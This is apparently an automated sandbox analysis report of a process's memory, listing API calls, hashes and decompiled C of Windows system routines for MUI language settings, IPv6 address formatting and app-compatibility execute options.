Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 38c86605ebbfdc29bf3fc2c0a99f6f5fcebd6fba47b8e428e16a01f79e180b20
Instruction ID: 696aa5b11bcdd8020e3e26a8e850b5bf63404dec504f5db33f101b093587cbcf
Opcode Fuzzy Hash: 38c86605ebbfdc29bf3fc2c0a99f6f5fcebd6fba47b8e428e16a01f79e180b20
Instruction Fuzzy Hash: D3F022322C42003AEA3165A89C03FE767E98B91F10F14001AF64EAB2C2C694B80243B4

Uniqueness

Uniqueness Score: -1.00%

Function 00098A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFC2,0008CFC2,?,00000000,?,?), ref: 00098A80

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 754199b42c501ae7296ba584b5924547fcc67e3e9be56436f73295e8645572b0
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: A6E01AB12002086BDB10DF89CC85EE737ADAF88650F018154FE0857242C930E910CBF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D45B

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction ID: 8045f5a81e9c2629aa03cdbc33acc79fd66f29b2be47c5d44376951cb22c637a
Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
Instruction Fuzzy Hash: 65D0A7717503043BEB10FAA49C03F6633CC6B45B44F494064FA48D73C3D960F9008561

Uniqueness

Uniqueness Score: -1.00%

Function 0008D427, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C83,?), ref: 0008D45B

Memory Dump Source

Source File: 0000000C.00000002.660726182.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1f9848deb416f11578b6449db3ed3cde44ec181d8b4685df8d899fe9f720ad71
Instruction ID: ded2a93a1012a46c2bd4dac65596d07eb74ab4ce9798a96f17188274662fe2b7
Opcode Fuzzy Hash: 1f9848deb416f11578b6449db3ed3cde44ec181d8b4685df8d899fe9f720ad71
Instruction Fuzzy Hash: 54D012716502016AEA14EB64ED17F266799BB52744F450055F544FF1D3DE24A4118B24

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00A58788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00A58788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00A58460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E00A3E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E00A5718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00A58460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E00A5718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00A58460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00A58460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00A58460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E00A5718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E00A3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00A32340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E00A4E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E00A3E2A8(_t322,  &_v68, _v16);
								if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E00A4E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E00A3E2A8(_t322,  &_v68, _t236);
								if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E00A5718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E00A3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00A32340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E00A4E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E00A3E2A8(_v12,  &_v68, _v16);
							if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E00A4E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E00A3E2A8(_t322,  &_v68, _t269);
							if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E00A5718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E00A3E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00A32340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E00A4E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E00A3E2A8(_v12,  &_v68, _v16);
						if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E00A4E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E00A3E2A8(_t322,  &_v68, _t296);
						if(E00A55553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E00A3E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00a58788
0x00a58788
0x00a58791
0x00a58794
0x00a58798
0x00a5879b
0x00a5879e
0x00a587a1
0x00a587a4
0x00a587a7
0x00a587aa
0x00a587af
0x00aa1ad3
0x00a58b0a
0x00a58b0d
0x00a58b13
0x00a58b19
0x00a58b1f
0x00a58b25
0x00a58b2b
0x00a58b31
0x00a58b37
0x00a58b3d
0x00a58b46
0x00a58b46
0x00a587c6
0x00a587d0
0x00aa1ae0
0x00aa1ae6
0x00aa1af8
0x00aa1af8
0x00aa1afd
0x00aa1afe
0x00aa1b01
0x00aa1b06
0x00aa1b06
0x00a587d6
0x00a587f2
0x00a587f7
0x00a58807
0x00a5880a
0x00a5880f
0x00a58810
0x00a58813
0x00a58818
0x00a58818
0x00a5882c
0x00a58831
0x00a58838
0x00a58908
0x00a58920
0x00a589f0
0x00a58a08
0x00a58af6
0x00a58af6
0x00a58af8
0x00a58afb
0x00aa1beb
0x00aa1beb
0x00a58b04
0x00aa1bf8
0x00aa1c0e
0x00aa1c13
0x00aa1c16
0x00aa1c16
0x00aa1bf8
0x00000000
0x00a58b04
0x00a58a0e
0x00a58a11
0x00a58a14
0x00a58a15
0x00a58a18
0x00a58a22
0x00a58b59
0x00a58a28
0x00a58a3c
0x00a58a3c
0x00a58a42
0x00aa1bb0
0x00aa1b11
0x00aa1b11
0x00000000
0x00a58a48
0x00a58a51
0x00a58a5b
0x00a58a5e
0x00a58a61
0x00a58a69
0x00a58a69
0x00a58a6d
0x00000000
0x00000000
0x00a58a74
0x00a58a7c
0x00a58a7d
0x00a58a91
0x00a58a93
0x00a58a93
0x00a58a98
0x00a58a9b
0x00a58aa1
0x00a58aa1
0x00a58aa4
0x00a58aaa
0x00a58ab1
0x00a58ac5
0x00a58ac7
0x00a58ac7
0x00a58ac5
0x00a58ace
0x00aa1bc9
0x00aa1bce
0x00aa1bd2
0x00aa1bd2
0x00a58ad8
0x00a58aeb
0x00a58aeb
0x00a58af0
0x00a58af4
0x00000000
0x00a58af4
0x00a58a42
0x00a58926
0x00a58929
0x00a5892c
0x00a5892d
0x00a58930
0x00a58935
0x00a5893a
0x00a58b51
0x00a58940
0x00a58954
0x00a58954
0x00a5895a
0x00aa1b63
0x00000000
0x00a58960
0x00a58969
0x00a58973
0x00a58976
0x00a58979
0x00a5897e
0x00a58981
0x00a58981
0x00a58986
0x00000000
0x00000000
0x00aa1b6e
0x00aa1b74
0x00aa1b7b
0x00aa1b8f
0x00aa1b91
0x00aa1b91
0x00aa1b99
0x00aa1b9c
0x00aa1ba2
0x00aa1ba2
0x00a5898c
0x00a58992
0x00a58999
0x00a589ad
0x00aa1ba8
0x00aa1ba8
0x00a589ad
0x00a589b6
0x00a589c8
0x00a589cd
0x00a589d0
0x00a589d0
0x00a589d6
0x00a589e8
0x00a589e8
0x00a589ed
0x00000000
0x00a589ed
0x00a5895a
0x00a5883e
0x00a58841
0x00a58844
0x00a58845
0x00a58848
0x00a5884d
0x00a58852
0x00a58b49
0x00a58858
0x00a5886c
0x00a5886c
0x00a58872
0x00aa1b0e
0x00000000
0x00a58878
0x00a58881
0x00a5888b
0x00a5888e
0x00a58891
0x00a58896
0x00a58899
0x00a58899
0x00a5889e
0x00000000
0x00000000
0x00aa1b21
0x00aa1b27
0x00aa1b2e
0x00aa1b42
0x00aa1b44
0x00aa1b44
0x00aa1b4c
0x00aa1b4f
0x00aa1b55
0x00aa1b55
0x00a588a4
0x00a588aa
0x00a588b1
0x00a588c5
0x00aa1b5b
0x00aa1b5b
0x00a588c5
0x00a588ce
0x00a588e0
0x00a588e5
0x00a588e8
0x00a588e8
0x00a588ee
0x00a58900
0x00a58900
0x00a58905
0x00000000
0x00a58905

APIs

_wcspbrk.LIBCMT ref: 00A58891
_wcspbrk.LIBCMT ref: 00A58979
_wcspbrk.LIBCMT ref: 00A58A61
_wcspbrk.LIBCMT ref: 00A58A9B
_wcspbrk.LIBCMT ref: 00AA1B9C

Strings

Kernel-MUI-Language-SKU, xrefs: 00A589FC
Kernel-MUI-Language-Disallowed, xrefs: 00A58914
WindowsExcludedProcs, xrefs: 00A587C1
Kernel-MUI-Number-Allowed, xrefs: 00A587E6
Kernel-MUI-Language-Allowed, xrefs: 00A58827

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: f50bc613d2a92da2911f3db046a0dafcc07fa9fc922d755f8133be2ec315fbdc
Instruction ID: 21875c0995fb2fcff49983cf42e40cee2a1e47ce98e4463feebb6a0803876379
Opcode Fuzzy Hash: f50bc613d2a92da2911f3db046a0dafcc07fa9fc922d755f8133be2ec315fbdc
Instruction Fuzzy Hash: FCF1C5B2D00209EFCF11DFA5CA819EEB7B9FF08301F15446AE905B7251EB359A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00A713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00A67707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xa32926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00A67707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xa39cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00A67707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00A67707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00A67707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00A67707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00a713d5
0x00a713d9
0x00a713dc
0x00a713de
0x00a713e1
0x00a713e8
0x00a713ee
0x00a9e8fd
0x00000000
0x00a9e921
0x00a9e921
0x00a9e928
0x00a9e982
0x00a9e98a
0x00000000
0x00a9e99a
0x00a9e99e
0x00a9e9a3
0x00a9e9a8
0x00a9e9b9
0x00a9e978
0x00000000
0x00a9e978
0x00a9e98a
0x00a9e92a
0x00a9e931
0x00a9e944
0x00a9e944
0x00a9e950
0x00a9e954
0x00a9e959
0x00a9e95e
0x00a9e963
0x00a9e970
0x00000000
0x00a9e975
0x00a9e93b
0x00a9e980
0x00000000
0x00a9e980
0x00a9e942
0x00a9e94b
0x00000000
0x00a9e94b
0x00000000
0x00a9e942
0x00a713f4
0x00a713f4
0x00a713f9
0x00a713fc
0x00a713ff
0x00a71406
0x00a9e9cc
0x00a9e9d2
0x00a9e9d2
0x00a9e9cc
0x00a7140c
0x00a71411
0x00a71431
0x00a7143a
0x00a7143c
0x00a7143f
0x00a7143f
0x00a71442
0x00a71447
0x00a714a8
0x00a714ac
0x00a9e9e2
0x00a9e9e7
0x00a9e9ec
0x00a9ea05
0x00a9ea05
0x00000000
0x00a71449
0x00000000
0x00a71449
0x00a7144c
0x00a71459
0x00a71462
0x00a71469
0x00a7146a
0x00a71470
0x00a71473
0x00a71476
0x00a71476
0x00a71490
0x00a71495
0x00a7138e
0x00a71390
0x00a71397
0x00a71398
0x00a71399
0x00a713a1
0x00a713a4
0x00a713a4
0x00a71498
0x00a7149c
0x00a7149f
0x00a714a2
0x00000000
0x00000000
0x00a714a4
0x00000000
0x00a714a4
0x00a71413
0x00a71415
0x00a71416
0x00a71419
0x00a7141c
0x00a71422
0x00a713b7
0x00a713bc
0x00a713bf
0x00a713bf
0x00a713c2
0x00a71424
0x00a71424
0x00a71424
0x00a71427
0x00a7142b
0x00a7142c
0x00a7142c
0x00a7142c
0x00000000
0x00a7141c
0x00a71411

APIs

___swprintf_l.LIBCMT ref: 00A7146B
___swprintf_l.LIBCMT ref: 00A71490
___swprintf_l.LIBCMT ref: 00A9E970

Strings

:%u.%u.%u.%u, xrefs: 00A9E9F4
::%hs%u.%u.%u.%u, xrefs: 00A9E967
ffff:, xrefs: 00A9E94B
::ffff:0:%u.%u.%u.%u, xrefs: 00A9E9B0

Memory Dump Source

Source File: 0000000C.00000002.661014357.0000000000A20000.00000040.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 0000000C.00000002.661005017.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661091576.0000000000B00000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661097627.0000000000B10000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661103096.0000000000B14000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661108198.0000000000B17000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661113209.0000000000B20000.00000040.00000001.sdmp Download File
Associated: 0000000C.00000002.661144031.0000000000B80000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: d3ae359e6c647fab4aaca658e78f338289d12bcdd21898cb2c1a4bf6e17d6d99
Instruction ID: b0dc536dd426ad2e46ae51e498229ab2fc77156c9978d1adba5ae043c0768897
Opcode Fuzzy Hash: d3ae359e6c647fab4aaca658e78f338289d12bcdd21898cb2c1a4bf6e17d6d99
Instruction Fuzzy Hash: 3961F3B1A04655AACF34DF9DCC818BFBBF5EF94300B14C52DF4AA47641D674AA40DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A67EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00A67EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xb12088; // 0x766f8297
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00A67F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00A83F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00A3DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xb14218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00A83F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00A40D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00A83F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00A48375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00A83F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00AAE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00A83F92();
					_t38 = 1;
					L2:
					return E00A3E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00a67f08
0x00a67f0f
0x00a67f12
0x00a67f1b
0x00a67f31
0x00a83ead
0x00a83eb4
0x00000000
0x00000000
0x00a83eba
0x00a83ecd
0x00a83ed2
0x00a83ee1
0x00a83ee7
0x00a83eec
0x00a83f12
0x00a83f18
0x00a83f1a
0x00000000
0x00000000
0x00a83f20
0x00a83f26
0x00a83f28
0x00000000
0x00000000
0x00a83f2e
0x00a83f30
0x00000000
0x00000000
0x00a83f3a
0x00a83f3b
0x00a83f53
0x00a83f64
0x00a83f69
0x00a83f6c
0x00a83f6d
0x00a83f6f
0x00a8e304
0x00a8e30f
0x00a8e315
0x00a8e31e
0x00a8e321
0x00a8e327
0x00a8e329
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8e32f
0x00a8e32f
0x00a8e337
0x00a8e33a
0x00a8e33b
0x00a8e33d
0x00a8e33f
0x00a8e341
0x00a8e341
0x00a8e34e
0x00a8e353
0x00a8e358
0x00a8e35d
0x00a8e35f
0x00000000
0x00000000
0x00a8e365
0x00a8e365
0x00a8e368
0x00a8e36e
0x00000000
0x00000000
0x00a8e374
0x00a8e32f
0x00a83f75
0x00a83f7a
0x00a83f7c
0x00a83f7e
0x00a83f86
0x00a67f39
0x00a67f47
0x00a67f47
0x00a67f37
0x00a67f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A83F12

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A83F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 00A8E345
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A83F4A
